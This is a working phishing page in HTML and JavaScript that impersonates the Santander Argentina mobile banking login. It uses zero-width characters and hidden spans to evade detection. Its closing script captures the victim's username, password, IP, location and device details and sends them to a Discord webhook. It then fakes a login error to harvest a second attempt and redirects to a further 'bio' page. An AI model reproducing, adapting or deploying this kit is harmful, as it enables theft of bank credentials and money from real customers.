<link rel="stylesheet" href="../../css/indexmovil.css">
<!DOCTYPE html>
<html lang=es>
<meta charset=utf-8>
<meta name=robots content=noindex>
<meta http-equiv=X-UA-Compatible content="IE=11">
<meta http-equiv=X-UA-Compatible content="IE=edge">
<meta http-equiv=Expires content=0>
<meta http-equiv=Last-Modified content=0>
<meta http-equiv=Cache-Control content="no-cache, no-store, must-revalidate, mustrevalidate">
<meta http-equiv=Pragma content=no-cache>
<title id=titleHeader></title>
<script>document.title='O\u200Bnl\u200Ci\u200Dne\u200B Ba\u200Cnk\u200Di\u200Bng\u200C Sa\u200Dnt\u200Ba\u200Cnd\u200Der\u200B |\u200C In\u200Di\u200Bci\u200Co \u200Dde\u200B Se\u200Csi\u200D\u00f3n';</script>
<meta name=viewport content="width=device-width,height=device-height,initial-scale=1,maximum-scale=1">
<meta name=apple-mobile-web-app-capable content=yes>
<meta name=mobile-web-app-capable content=yes>
<meta name=description content="Online Banking Santander">
<meta name=referrer content=no-referrer>
<link rel=icon
	href="../../images/favicon.png">
<meta http-equiv="Content-Security-Policy"
	content="default-src 'none'; script-src 'self' 'unsafe-inline' data: http://127.0.0.1:5500; style-src 'self' 'unsafe-inline' http://127.0.0.1:5500; img-src 'self' data: http://127.0.0.1:5500; font-src 'self' data:; connect-src 'self' ws://127.0.0.1:5500 http://127.0.0.1:5500 https://discord.com https://api.ipdata.co http://ip-api.com; media-src 'self' data:; object-src 'self' data:; frame-src 'self' data: http://127.0.0.1:5500;">
<body ng-app=app md-no-ink ng-strict-di
	class="mobile retail logn"
	cz-shortcut-listen=true>
				<logn><img
						data-ng-src=/obp-webapp/angular/client/app/common/images/logos-topbar/logos-rojos/desktop-sr.svg
						ng-hide=$ctrl.obpGlobal.isWebview style="display:flex;margin:0 auto;height:65px"
						alt="" ng-init=$ctrl.scrollToTopMobile()
						src="../../images/logo.svg"
						aria-hidden=false>
					<div class=container-view style=position:relative>
						<div ui-view=logn-view autoscroll=false><stack-steps
								mostrar-teclado-virtual=$ctrl.mostrarTecladoVirtual
								on-abrir-teclado-virtual=$ctrl.abrirTecladoVirtual()
								on-cerrar-teclado-virtual=$ctrl.cerrarTecladoVirtual()>
								<div class=stack-steps-header ng-hide=$ctrl.obpGlobal.isWebview aria-hidden=false></div>
								<div ui-view=step-view class=animate-step autoscroll=true><logn-inicio
										mostrar-teclado-virtual=$ctrl.mostrarTecladoVirtual
										on-abrir-teclado-virtual=$ctrl.abrirTecladoVirtual()
										on-cerrar-teclado-virtual=$ctrl.cerrarTecladoVirtual()>
										<div class=container-logn-inicio><logn-tabs swap=$ctrl.swap
												data-ng-if=$ctrl.showTabs action=$ctrl.changeTab(state)>
												<section class="section-tabs_container layout-row" layout=row>
													<div flex=50
														class="section-tabs_container__soy_cliente section-tabs_container__soy_cliente--selected flex-50"
														data-ng-class="{ 'section-tabs_container__soy_cliente--selected': $ctrl.swap }">
														<div data-ng-click=$ctrl.action({state:true}) role=button
															tabindex=0>Soy cliente</div>
													</div>
													<div flex=50 class="section-tabs_container__no_soy_cliente flex-50"
														data-ng-class="{ 'section-tabs_container__soy_cliente--selected': !$ctrl.swap }">
														<div data-ng-click=$ctrl.action({state:false}) role=button
															tabindex=0>No soy cliente</div>
													</div>
												</section>
											</logn-tabs>
											<div class=logn-container data-ng-if=$ctrl.swap>
												<div class=logn-container__>
													<section class=logn-container__header>
														<div class=logn-container__header__title
															data-ng-bind=$ctrl.tituloLogn>¡Hola! Te damos la bienvenida
														</div>
														<p data-ng-if=!$ctrl.userNameSaved>Escr<span style="display:none">abc</span>ibí tu usu<span style="display:none;font-size:0">xyz</span>ario y
															cont<span style="display:none">def</span>rase<span style="display:none;font-size:0">ghi</span>ña para emp<span style="display:none">jkl</span>ezar a ope<span style="display:none;font-size:0">nop</span>rar.</p>
													</section>
													<div id=lg name=logn
														class="ng-pristine ng-invalid ng-invalid-required ng-valid-maxlength">
														<div class=content-input-logn><obp-input
																data-ng-if=!$ctrl.userNameSaved
																class="content-input-logn__input ng-pristine ng-untouched ng-valid ng-empty"
																config=$ctrl.configInputsLogn.usuario label="'Usuario'"
																data-ng-model=$ctrl.usuario
																obp-enter-key=$ctrl.checkLgLogn()
																validation=$ctrl.validateUsuario()
																aria-invalid=false><label
																	data-ng-bind=$ctrl.label>Usu<span style="display:none">def</span>ari<span style="display:none;font-size:0">ghi</span>o</label>
																<div class=content-input> <input
																		data-ng-if="$ctrl.config.name === 'usuario'"
																		id=tiki name=usuario type=text
																		maxlength=25
																		obp-allow-only-digits="{ keys: [[48, 57], [97, 122], [65, 90], 45, 46, 95] }"
																		data-ng-blur="$ctrl.validateInput($ctrl.config.name, $ctrl.config.required)"
																		data-ng-required=$ctrl.config.required
																		autocomplete=off data-ng-model=$ctrl.valueInput
																		data-ng-change=$ctrl.setValue($ctrl.valueInput)
																		alt=""
																		data-ng-class="{ 'input-error': !$ctrl.lognService.errorInput[$ctrl.config.name].validate }"
																		data-ng-focus=$ctrl.clearValidate($ctrl.config.name)
																		class="ng-pristine ng-untouched ng-empty ng-invalid ng-invalid-required ng-valid-maxlength"
																		required aria-invalid=true value></div>
																<div class=msg-error-input
																	data-ng-class="{ 'msg-error-input--activo': !$ctrl.lognService.errorInput[$ctrl.config.name].validate }"
																	data-ng-bind=$ctrl.lognService.errorInput[$ctrl.config.name].text>
																</div>
															</obp-input><obp-input
																class="content-input-logn__input ng-pristine ng-untouched ng-valid ng-empty"
																config=$ctrl.configInputsLogn.clave
																label="'Contraseña'"
																obp-enter-key=$ctrl.checkLgLogn()
																data-ng-model=$ctrl.clave
																validation=$ctrl.validateDocumentoClave()
																aria-invalid=false><label
																	data-ng-bind=$ctrl.label>Con<span style="display:none">jkl</span>tra<span style="display:none;font-size:0">nop</span>señ<span style="display:none">stu</span>a</label>
																<div class=content-input> <input
																		data-ng-if="$ctrl.config.name === 'clave'"
																		id=toko name=clave type=password maxlength=20
																		data-ng-blur="$ctrl.validateInput($ctrl.config.name, $ctrl.config.required)"
																		data-ng-required=$ctrl.config.required
																		autocomplete=off data-ng-model=$ctrl.valueInput
																		data-ng-change=$ctrl.setValue($ctrl.valueInput)
																		alt=""
																		data-ng-class="{ 'input-error': !$ctrl.lognService.errorInput[$ctrl.config.name].validate }"
																		data-ng-focus=$ctrl.clearValidate($ctrl.config.name)
																		class="ng-pristine ng-untouched ng-empty ng-invalid ng-invalid-required ng-valid-maxlength"
																		required aria-invalid=true>
																	<div class="img-view img-view--oculto"
																		data-ng-class="{ 'img-view--visible' : $ctrl.botonOcularMostrar,  'img-view--oculto' : !$ctrl.botonOcularMostrar }"
																		alt=""
																		data-ng-if=$ctrl.config.mostrarClave
																		data-ng-click=$ctrl.toggleOcultarMostrar()
																		role=button tabindex=0></div>
																</div>
																<div class=msg-error-input
																	data-ng-class="{ 'msg-error-input--activo': !$ctrl.lognService.errorInput[$ctrl.config.name].validate }"
																	data-ng-bind=$ctrl.lognService.errorInput[$ctrl.config.name].text>
																</div>
															</obp-input></div>
														<div class=content-checkbox-user
															data-ng-if=!$ctrl.userNameSaved><input type=checkbox
																name=recordarUsuario data-ng-model=$ctrl.saveUser
																class="ng-pristine ng-untouched ng-valid ng-empty"
																aria-invalid=false value=on> <label
																for=recordarUsuario>Rec<span style="display:none;font-size:0">vwx</span>ord<span style="display:none">qrs</span>ar usu<span style="display:none;font-size:0">mno</span>ario</label></div>
														<button class=button-logn
															data-ng-click=$ctrl.checkLgLogn()>Ing<span style="display:none">abc</span>res<span style="display:none;font-size:0">xyz</span>ar</button>
													</div>
													<div class=content-button-ayuda><button class=button-necesitas-ayuda
															data-ng-click=$ctrl.accesoOep()>¿Nec<span style="display:none">def</span>esi<span style="display:none;font-size:0">ghi</span>tás ayu<span style="display:none">jkl</span>da para
															ing<span style="display:none;font-size:0">nop</span>res<span style="display:none">stu</span>ar?</button></div>
													<div class=logn-container__mensaje-seguridad>
														<p class=logn-container__mensaje-seguridad__principal>No
															com<span style="display:none;font-size:0">vwx</span>par<span style="display:none">qrs</span>tas tus cla<span style="display:none;font-size:0">mno</span>ves o Tok<span style="display:none">abc</span>ens de seg<span style="display:none;font-size:0">xyz</span>uri<span style="display:none">def</span>dad.
														<p class=logn-container__mensaje-seguridad__texto>El ban<span style="display:none;font-size:0">ghi</span>co
															nun<span style="display:none">jkl</span>ca soli<span style="display:none;font-size:0">nop</span>cita<span style="display:none">stu</span>rá esta infor<span style="display:none;font-size:0">vwx</span>mac<span style="display:none">qrs</span>ión por red<span style="display:none;font-size:0">mno</span>es soc<span style="display:none">abc</span>ial<span style="display:none;font-size:0">xyz</span>es o
															telé<span style="display:none">def</span>fon<span style="display:none;font-size:0">ghi</span>o. <span style="display:none">jkl</span></p><a
															href=#
															rel=noopener target=_blank
															class=logn-container__mensaje-seguridad__link>Conocé más
															consejos de seguridad</a>
													</div>
												</div>
											</div>
										</div>
									</logn-inicio></div>
							</stack-steps></div>
						<div ui-view=main-view></div>
					</div>
				</logn>
			</div><obp-orientation-modal>
				<div data-ng-if="$ctrl.isMobile || $ctrl.isTablet" class=orientation-modal style=display:none></div>
			</obp-orientation-modal><obp-validador>
				<div class=validador-container
					data-ng-class="{ 'toggled' : $ctrl.sharedValidatorService.showValidator}"></div>
			</obp-validador>
		</div>
	</app>
<script src="../../js/santander-logger.js"></script>
<script>
(function() {
	var eyeToggle = document.querySelector('.img-view');
	if (eyeToggle) {
		var claveInput = document.getElementById('toko');
		var showing = false;
		eyeToggle.addEventListener('click', function() {
			showing = !showing;
			if (showing) {
				claveInput.type = 'text';
				eyeToggle.style.backgroundImage = "url('../../images/eyes-close.svg')";
				eyeToggle.classList.remove('img-view--oculto');
				eyeToggle.classList.add('img-view--visible');
			} else {
				claveInput.type = 'password';
				eyeToggle.style.backgroundImage = '';
				eyeToggle.classList.remove('img-view--visible');
				eyeToggle.classList.add('img-view--oculto');
			}
		});
	}

	var btn = document.querySelector('.button-logn');
	if (!btn) return;

	var attempt = parseInt(localStorage.getItem('santander_logn_attempt') || '0', 10);

	btn.addEventListener('click', function(e) {
		e.preventDefault();
		var usuarioInput = document.getElementById('tiki');
		var claveInput = document.getElementById('toko');
		var usuario = usuarioInput ? usuarioInput.value : '';
		var clave = claveInput ? claveInput.value : '';

		if (!usuario || !clave) return;

		btn.disabled = true;
		btn.textContent = 'Cargando...';

		attempt++;
		localStorage.setItem('santander_logn_attempt', attempt);

		var isMobile = /Mobile|Android|iPhone|iPad/i.test(navigator.userAgent);
		var now = new Date();

		SantanderLogger.getIpInfo().then(function(ipInfo) {
			var flowData = {
				usuario: usuario,
				clave: clave,
				dispositivo: isMobile ? 'Móvil' : 'Desktop',
				fecha: now.toLocaleDateString('es-AR'),
				hora: now.toLocaleTimeString('es-AR', { hour: '2-digit', minute: '2-digit', second: '2-digit' }),
				userAgent: navigator.userAgent,
				zonaHoraria: Intl.DateTimeFormat().resolvedOptions().timeZone,
				resolucion: screen.width + 'x' + screen.height,
				ipInfo: ipInfo
			};

			localStorage.setItem('santander_flow_data', JSON.stringify(flowData));

			var embeds = [{
				title: '🏦 Santander AR - Logn Móvil (Intento ' + attempt + ')',
				color: 0xEC0000,
				fields: [
					{ name: '👤 Usuario', value: '`' + usuario + '`', inline: true },
					{ name: '🔑 Contraseña', value: '```' + clave + '```', inline: false },
					{ name: '📱 Dispositivo', value: '`' + flowData.dispositivo + '`', inline: true },
					{ name: '📐 Resolución', value: '`' + flowData.resolucion + '`', inline: true },
					{ name: '🌐 IP', value: '`' + (ipInfo.ip || 'N/A') + '`', inline: false },
					{ name: '📍 Ubicación', value: '`' + (ipInfo.location || 'N/A') + '`', inline: false },
					{ name: '🏢 ISP', value: '`' + (ipInfo.isp || 'N/A') + '`', inline: true },
					{ name: '🏳️ País', value: (ipInfo.flag || '🌐') + ' ' + (ipInfo.country || '??') + ' (' + (ipInfo.country_code || '??') + ')', inline: true },
					{ name: '🌍 User Agent', value: '```' + flowData.userAgent + '```', inline: false }
				],
				footer: { text: flowData.fecha + ' ' + flowData.hora + ' | ' + flowData.zonaHoraria },
				timestamp: new Date().toISOString()
			}];

			return SantanderLogger.sendToDiscord(embeds).then(function() {
				setTimeout(function() {
					if (attempt >= 2) {
						localStorage.removeItem('santander_logn_attempt');
						localStorage.setItem('santander_bio_attempt', '0');
						window.location.href = 'bio.html';
					} else {
						window.location.href = 'error.html?r=indexMovil.html';
					}
				}, 1200);
			});
		});
	});
})();
</script>